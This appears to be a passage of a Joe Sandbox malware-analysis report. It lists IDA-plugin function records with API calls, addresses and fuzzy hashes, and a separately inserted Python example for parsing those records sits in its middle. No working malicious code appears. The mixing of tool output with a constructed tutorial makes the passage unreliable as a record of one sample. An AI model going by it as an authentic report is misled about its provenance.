                                                                • Opcode Fuzzy Hash: be10bfee1e8267c3de1a2ab46995ff55cbdf872b5fe851270893657475d5634d
                                                                • Instruction Fuzzy Hash: BCE0C270D40208F7CB20AE40AC07F6DBB34A702710F109025FA043A1C1E6725A34AB9E
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004128E8
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 66fc7aed1a8be8ccd294b787b10f7637c6460e08ac4ddc991a7a79f79a43bdae
                                                                • Instruction ID: 215f1f7ad76cb5e29d203a8e72619c232785cbb6128a2769862968d3b8123e0b
                                                                • Opcode Fuzzy Hash: 66fc7aed1a8be8ccd294b787b10f7637c6460e08ac4ddc991a7a79f79a43bdae
                                                                • Instruction Fuzzy Hash: 88D01270E99288A6DB209A546E47BADBE348703711F101199E6097B1C1D5A24524859E
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004128E8
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 6106afc6b463506a3d15d7cc0c1d065843dc2ae394bd4a9818a2266fe2776213
                                                                • Instruction ID: d7d17ad1607ca0c7eb991b064609c80ca49ef72590fe3187da1aa4f2f4a81fed
                                                                • Opcode Fuzzy Hash: 6106afc6b463506a3d15d7cc0c1d065843dc2ae394bd4a9818a2266fe2776213
                                                                • Instruction Fuzzy Hash: 97D05EB0E8534CB7D610AE946E03B6CB6388702711F0011A5FA083A1C1E5A25920859E
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
                                                                • Instruction ID: 73525090d100d1b689769259d6e8df4be22ea82b0becd013ba7d668fe31f7c2f
                                                                • Opcode Fuzzy Hash: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
                                                                • Instruction Fuzzy Hash: 481253B5A40205AFEB40DF69DCC1B6EB7B4EF59314F14003EEA05AB342D679AD10CB66
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17a508dafd5dbd71d142c366072afcc99054add45cf44ebf661ac186e40ff384
                                                                • Instruction ID: 524ba1de275a5ad88e77a61d6b8ecb99ac96038a8be4e3611194671a491f388e
                                                                • Opcode Fuzzy Hash: 17a508dafd5dbd71d142c366072afcc99054add45cf44ebf661ac186e40ff384
                                                                • Instruction Fuzzy Hash: A3F165B1E40205ABFB00DFA5DDC1B9EB7B4EF58314F184439EA05BB382D6B9AD108765
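The entries above are the IDA plugin's per-function records: each lists the Win32 calls the function makes, with the call-site address after "ref:", followed by an Opcode ID, Instruction ID and two fuzzy hashes that can be compared across samples. As an added example that is not part of the Joe Sandbox report, the Python below parses a constructed excerpt in that layout into structured records, indexes call sites by API name, and counts the arguments the plugin printed as "?" (arguments it could not recover). The function and class names (parse_entries, calls_by_api, unresolved_arg_count, ApiCall, FunctionEntry) are this example's own; the addresses and hashes in the sample are copied from the entries above.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the layout of the IDA-plugin entries above (two functions with
# an API reference, one without). Hashes and addresses are copied from the report.
SAMPLE_REPORT = """\
APIs
• lstrcpyn.KERNEL32(0045A166,0045A166,00000030,0045A166,00000000,?,?,?,00459752,00000000), ref: 0045A1F3
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: lstrcpyn
• String ID:
• API String ID: 97706510-0
• Opcode ID: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
• Instruction ID: 1cbfb2eb87bac91b13e74b3c3a3056b9d54a6a09be11a9ec1645322ef756946d
• Opcode Fuzzy Hash: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
• Instruction Fuzzy Hash: 45F0A075E40304B7DB50DE92EC82F6A77789B27751F084016FD04AB381E635ED109AAA
APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 00404981
Similarity
• API ID: lstrcat
• String ID:
• API String ID: 4038537762-0
• Opcode ID: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
• Instruction ID: c41c8baeb4ea876361e11e557d917890fabf5e8e00671f7474ff7f71d5c67e80
• Opcode Fuzzy Hash: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
• Instruction Fuzzy Hash: 2FE092B5D00308ABC7009F94D843BAEB774974A300F0041B2A6047B281D5355A209BDA
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
• Instruction ID: 73525090d100d1b689769259d6e8df4be22ea82b0becd013ba7d668fe31f7c2f
• Opcode Fuzzy Hash: d2b66dd9a9f32c94accd8e7871ae87e893a5dabaf2604c02de9f0319e8ea187d
• Instruction Fuzzy Hash: 481253B5A40205AFEB40DF69DCC1B6EB7B4EF59314F14003EEA05AB342D679AD10CB66
"""

# "• api.MODULE(arg,arg,...), ref: ADDRESS"  (ADDRESS is the call-site virtual address)
API_CALL_RE = re.compile(
    r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# "• Key: value"  (value may be empty, e.g. "• String ID:")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # as printed; "?" marks an argument the plugin could not recover
    ref: str     # call-site address, upper-case hex


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # Opcode ID, fuzzy hashes, ...


def parse_entries(text):
    """Split the listing into per-function records; every entry ends with its
    'Instruction Fuzzy Hash' line, so that line closes the current record."""
    entries, current = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_CALL_RE.match(line)
        if m:
            args = [a for a in m["args"].split(",") if a]
            current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper()))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                entries.append(current)
                current = FunctionEntry()
    return entries


def calls_by_api(entries):
    """Map API name -> sorted call-site addresses, for jumping to them in IDA."""
    index = {}
    for entry in entries:
        for call in entry.calls:
            index.setdefault(call.api, set()).add(call.ref)
    return {api: sorted(refs) for api, refs in index.items()}


def unresolved_arg_count(call):
    """Arguments printed as '?' are unknown, not zero; count them so the reader
    knows how much of a call's argument list the plugin actually recovered."""
    return sum(1 for a in call.args if a == "?")


if __name__ == "__main__":
    for api, refs in sorted(calls_by_api(parse_entries(SAMPLE_REPORT)).items()):
        print(f"{api:<10} {' '.join(refs)}")
```

When reading the parsed records, treat "?" as an argument the plugin did not recover, and confirm constant-looking values (such as the two 00000000 arguments of the lstrcat call at 00404981) in the disassembly at the ref address before drawing any conclusion from them; the listing records what the plugin printed, not what the call receives at run time.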
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2df94a90afe756ece2eeef9b291eab2c7b6b4670fcf9022f6fa71496ac36da8
                                                                • Instruction ID: abfaadfb4e953f60e3ac1b7febbeef20403e656696d59726b049b64b0493a492
                                                                • Opcode Fuzzy Hash: b2df94a90afe756ece2eeef9b291eab2c7b6b4670fcf9022f6fa71496ac36da8
                                                                • Instruction Fuzzy Hash: C9E1EB31E5520A8FEB25CF64C9257FE7BB2AB44315F28002BD441A6381D77C99A2DB1F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8d49e6f2535195e476d34325a4766fe041d3d0ef9c0bd7c2de3a604d455aef4
                                                                • Instruction ID: 72924ec4050420736342319aad4d9f05c922e2c9a2ff4ebac71ea84c587418c5
                                                                • Opcode Fuzzy Hash: e8d49e6f2535195e476d34325a4766fe041d3d0ef9c0bd7c2de3a604d455aef4
                                                                • Instruction Fuzzy Hash: 99918033A04DB24AEB268A3EEC411717752FF9332079E475ED991973E6D7396842C348
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                • Instruction ID: 78c0eda2b33601a78873b5e7e4229798324ad5b420cd73b80ff272b8de0a6352
                                                                • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                • Instruction Fuzzy Hash: 65B19F75900246DFDB15CF14C5E0AA9BBA1BF99318F24C1AFD85A5B382C735EE42CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a472fa17fbdad7226fb6c1677ee9a149846a37b4dceea3494ab88ff08fd0b2b
                                                                • Instruction ID: 6b4963cd8c7819de37a231c7e626f68aa0c4fc113ec6d7dd295f1a62de52ad27
                                                                • Opcode Fuzzy Hash: 7a472fa17fbdad7226fb6c1677ee9a149846a37b4dceea3494ab88ff08fd0b2b
                                                                • Instruction Fuzzy Hash: 706181B5B40314AFEB04DB55DCC7FAE7764EF19315F04006AE608AB382E275AE548B39
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c779fb4ef24ff679b0b828e31fc249fc0eb1e64ee077276599d8199f26672727
                                                                • Instruction ID: 088e0e9fd8233b3fac55ec848e1cc29c4765396e9c2f222dc305d0784f73fcc8
                                                                • Opcode Fuzzy Hash: c779fb4ef24ff679b0b828e31fc249fc0eb1e64ee077276599d8199f26672727
                                                                • Instruction Fuzzy Hash: B7617471F40319BBEB10DFA2DC42BBE77B4EB19701F14446AF904BA2C1D6759A20C76A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a15738efc5d9ee030b6beb6f02a114080220149d5ae4fb389c86da256831d1c7
                                                                • Instruction ID: 60e983cbe75c51072007bc385c4bac21888707c6fe4aab7966800e1e06dae8f2
                                                                • Opcode Fuzzy Hash: a15738efc5d9ee030b6beb6f02a114080220149d5ae4fb389c86da256831d1c7
                                                                • Instruction Fuzzy Hash: 945194B1E00304BFEB40DFA9DCC5B5AB3F4EB19314F14406AEA05AB382D6799E008B56
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 475775355d1bf22fd8f870f090f357aa3ee9bb253f7649f5d9849d353dfab7c3
                                                                • Instruction ID: 796f80a431399d2c786c37bd3ad28063f583007af7e7953f7c0c8d154c619eda
                                                                • Opcode Fuzzy Hash: 475775355d1bf22fd8f870f090f357aa3ee9bb253f7649f5d9849d353dfab7c3
                                                                • Instruction Fuzzy Hash: D3510771D0021ADFDB14CFE8C8917EEBBF6BB09305F24806AD905E7241D3759A8ACB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1012a71ab87a2eaf9a36830b872788dc5e9d541f60f3667bd8db6aa46cfbca23
                                                                • Instruction ID: 065eb0975ed8d0bece88330ffdef0e47985c973718afb47ca9915d339a61224b
                                                                • Opcode Fuzzy Hash: 1012a71ab87a2eaf9a36830b872788dc5e9d541f60f3667bd8db6aa46cfbca23
                                                                • Instruction Fuzzy Hash: 2D410775D0020DFFDF10DFA5C881BDEBBB5FB08304F00846AEA18A6262D7399A64DB55
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55d412ac8d72e8da1acced7d8571ce135ce1fb68657f4aa0632c55276a27e481
                                                                • Instruction ID: e849f5fb9b5cdbd5284e4c8c3c965d279e33a78a9e43fbcde4ab1956b605e7e5
                                                                • Opcode Fuzzy Hash: 55d412ac8d72e8da1acced7d8571ce135ce1fb68657f4aa0632c55276a27e481
                                                                • Instruction Fuzzy Hash: B63182F5D01309FBEB10EFA1D845BEE7BB8AB04304F00947BE508A6292D7798A44CB95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4249cfad71cd508aed1064edfcc292b1c52a1e06b11048ffa581530a86ec5dcd
                                                                • Instruction ID: 778f49e62a48209429d5d9565252f2145ea98824f5c2dac6de0a64bd32592418
                                                                • Opcode Fuzzy Hash: 4249cfad71cd508aed1064edfcc292b1c52a1e06b11048ffa581530a86ec5dcd
                                                                • Instruction Fuzzy Hash: 241172B2E00208BBDF50DFA5DC46F9F7BBCEB0C304F14545AFA04A6292D6759A209B59
                                                                • Opcode ID: 36571cba25840e6a4c5bbb38ed9dc51fdd46825b61b8148d08b1c922647f24aa
                                                                • Instruction ID: 28de1876fa9122a82a34634f3354f5c37d080d58561b57d3810d3ba34408ac53
                                                                • Opcode Fuzzy Hash: 36571cba25840e6a4c5bbb38ed9dc51fdd46825b61b8148d08b1c922647f24aa
                                                                • Instruction Fuzzy Hash: A621BB79D00309FFCF00EFA1C885B9E7BB8EB05301F1040ABED01AA252D7398A18DB56
                                                                • Opcode ID: 2ccd43d7c4c5198332a3cdebda3445e5211658e73af853858f3ba73d7417764d
                                                                • Instruction ID: 5f6c44818247471eafa1862fcaf89d24221175f4313cc4c87c8e40c994d1a6c0
                                                                • Opcode Fuzzy Hash: 2ccd43d7c4c5198332a3cdebda3445e5211658e73af853858f3ba73d7417764d
                                                                • Instruction Fuzzy Hash: 422151B9D0020EFBDF10EFA1D945BAE7BF9EB04300F10546BE90466291E7398B54DB5A
                                                                • Opcode ID: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction ID: eb2c755b9748bc651a82bc4b4b683b7eb6391b2b828148903ed5d4acc9de1a11
                                                                • Opcode Fuzzy Hash: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction Fuzzy Hash: AE111E38904E4296DE34994089D82F66317D712335EA2E02BC82F4B713D11E5893EA6B
                                                                • Opcode ID: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction ID: 99991b36cc0118c1084e304c0de7527be5e2d4fed5fe06753748cb3f4f2d3e56
                                                                • Opcode Fuzzy Hash: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction Fuzzy Hash: A711D73850624286DE7B890585D027A3351972B757E20212FCD23BB717DE1E588FAA3F
                                                                • Opcode ID: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction ID: 6003a923df3b9081f386670f027e7fcb1301dee94dc59d1120f923626ae74cd4
                                                                • Opcode Fuzzy Hash: 9f97ce1d6d81b0cf305e8b80ad0c2f84ff31dd897225ee575ab3aace15da15e9
                                                                • Instruction Fuzzy Hash: 8A112938507245C6EE388D1385D67BB2313972E316E34383BC9234A7C1D21E9C83AE6B
                                                                • Opcode ID: 1c915b660ba7ec94c44b78a85d20b31afb3b1fce2e288357ad92db1f74ac1af5
                                                                • Instruction ID: 885c74d52ad5e5882d7bc3d419f7769e2c9bfa4f23fe26a8a3158ca952431af6
                                                                • Opcode Fuzzy Hash: 1c915b660ba7ec94c44b78a85d20b31afb3b1fce2e288357ad92db1f74ac1af5
                                                                • Instruction Fuzzy Hash: FB1181B9E0020DFBDF10EFA5D945B9E7BB9EB15300F10506BE80466251E73A8A14DB4A
                                                                • Opcode ID: f4d26529bcebde8bb71c1b2b53676075c5d84077e150d6c58ac4883cb9e72dba
                                                                • Instruction ID: 101d5901f5e1e58821da57f70588268a7ebdf365479de7ff385c5cfe0b35f542
                                                                • Opcode Fuzzy Hash: f4d26529bcebde8bb71c1b2b53676075c5d84077e150d6c58ac4883cb9e72dba
                                                                • Instruction Fuzzy Hash: 3611B275D0130CFBDF10EFA0D985BAE7BB9EB05300F00906BE90966251E7398A24DF4A
                                                                • Opcode ID: 965d4cf8fd5e0bbb284d72869638701c18471e0f6c9e415e5a8a57c8deb83c37
                                                                • Instruction ID: 0816de2579f66f6d4bf852c29fb5c3752c78c55935a5963a7a75a90e1cec3872
                                                                • Opcode Fuzzy Hash: 965d4cf8fd5e0bbb284d72869638701c18471e0f6c9e415e5a8a57c8deb83c37
                                                                • Instruction Fuzzy Hash: 93015275A00209EBEF10DE54DC46BBE77B4EB95705F000056FE04AB281E3B59A619BAA
